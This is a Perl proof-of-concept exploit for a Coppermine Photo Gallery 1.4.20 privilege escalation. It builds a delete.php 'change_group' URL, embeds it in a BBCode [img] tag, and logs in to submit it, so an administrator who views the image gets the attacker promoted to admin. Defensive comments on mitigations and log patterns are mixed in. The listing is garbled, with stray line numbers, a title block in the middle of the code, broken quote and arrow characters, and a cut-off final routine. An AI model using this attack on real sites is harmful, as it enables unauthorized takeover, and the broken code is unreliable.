1 #!/usr/bin/perl
2 #inphex - inphex0 at gmail dot com
3 #based on http://milw0rm.com/exploits/8114 - found by StAkeR
4 #In case this does not work check out pos(Line 80) and find another value for it
5 use IO::Socket;
6 use LWP::UserAgent;
7 use LWP::Simple;
8 use HTTP::Cookies;
# Proof-of-concept driver for the Coppermine 1.4.20 [img] privilege
# escalation. Six positional arguments are required:
#   host, gallery path, the submitting account's user id, album number,
#   and that account's username and password.
#
# Flow visible in this part of the listing: fetch the gallery path once over
# a raw socket, build a delete.php "change_group" URL for the given user id,
# wrap it in an [img] BBCode tag, then hand everything to _send().
#
# Defender's reading: the group change travels as a plain GET URL, so it
# fires in whichever browser loads the image link. Presumably the request
# only succeeds when that browser holds an administrator session -- confirm
# against the application's delete.php. The application-side mitigations are
# a per-session anti-CSRF token on change_group, refusing state changes over
# GET, and upgrading from the affected release. In web logs, look for GET
# requests to delete.php carrying action=change_group&what=user whose
# Referer is a gallery content page rather than the admin user manager.
$_1 = shift;                    # [HOST]
$n  = ($_1 eq "") ? 0 : 1;
$h  = $n;                       # true when a host argument was supplied

# [PATH] [ID] [ALBUMNUM] [USER] [PASS]; missing arguments stay undef.
($_2, $_3, $_4, $_5, $_6) = splice @ARGV, 0, 5;

$d_p = 80;                      # target TCP port

# Print usage and stop unless every argument is present and true.
unless ($_1 && $_2 && $_3 && $_4 && $_5 && $_6) {
    print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n",
          "perl coppermine host.com /path/ 3 2 inphex 123456";
    exit;
}

if ($h) {
    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $_1,
        PeerPort => $d_p,
    ) or die("[-]ERROR");

    # Single GET for the gallery path. The response is accumulated in
    # $f_answer, which nothing in the lines shown here reads afterwards.
    print $socket "GET $_2 HTTP/1.1\n"
                . "Host: $_1\n"
                . "Accept: */*\n"
                . "Connection: close\n\n";

    while (defined($answer = <$socket>)) {
        $f_answer .= $answer;
    }

    # NOTE(review): the subs are invoked with a leading "&", which bypasses
    # their declared prototypes; gen_url($$) receives three arguments and
    # _send($$$$) receives seven.
    if ($url = &gen_url($_1, $_2, $_3)) {
        $code = &gen_code($url);
        $res  = &_send($_1, $_2, $_3, $_4, $code, $_5, $_6);
    }
}
39
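# Build the state-changing URL that this proof of concept depends on.
#
# Arguments: host name, gallery path (written as "/path/" in the script's
# usage text) and a user id. Returns an http:// URL for delete.php whose
# query string requests action=change_group for user "u<ID>" with group=1.
# group=1 is presumably the administrators group -- confirm against the
# Coppermine schema of the version under test.
#
# Security note: everything the request needs is in the query string, so the
# endpoint can be driven by a bare GET. A fixed application would require a
# per-session token and a POST for this action.
#
# Declared without the original ($$) prototype, which named two arguments
# although the caller passes three. The arguments are now read into lexicals
# instead of overwriting the package globals $h, $p, $i and $url, and the
# URL is built from the arguments rather than from the globals $_1 and $_2.
sub gen_url {
    my ($host, $path, $user_id) = @_;

    # The query string is assembled from whole pieces: the extracted listing
    # had the literal wrapped inside "delete_comments", which would have put
    # a newline into the URL.
    return "http://" . $host . $path
         . "delete.php?id=u" . $user_id . "&u" . $user_id
         . "=&action=change_group&what=user&new_password=&group=1"
         . "&delete_files=no&delete_comments=no";
}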
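# Wrap a URL in a BBCode [img] tag, preceded by the filler text "yoyoyo".
#
# Argument: the URL to embed. Returns the BBCode string.
#
# Security note: a rendered [img] tag makes the viewer's browser issue a GET
# for the URL, so any state-changing GET endpoint becomes reachable through
# user-submitted markup. Renderers can reduce the exposure by rejecting image
# URLs that carry query strings or that point at the application's own
# scripts; the endpoint itself still needs a request token.
#
# The argument is held in a lexical so the call no longer overwrites the
# package globals $url and $code.
sub gen_code($) {
    my ($link) = @_;
    return "yoyoyo[img]" . $link . "[/img]";
}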
Coppermine Photo Gallery 1.4.20 IMG Privilege Escalation Exploit
Inphex
02/26/2009
52 sub _send($$$$) {
53
$h = "http://".shift;
54
$p = shift;
55
$i = shift;
56
$aid = shift;
57
$co = shift;
58
$u = shift;
59
$pass = shift;
60
61
$xpl = LWP::UserAgent−>new() or die;
62
$cookie_jar = HTTP::Cookies−>new();
63
$xpl−>cookie_jar( $cookie_jar );
64
65
$login = $xpl−>post($h.$p.’login.php?referer=index.php’,
66
Content => [
67
"username" => $u,
68
"password" => $pass,
69
"submitted" => "Login",
70
],);
71
if($c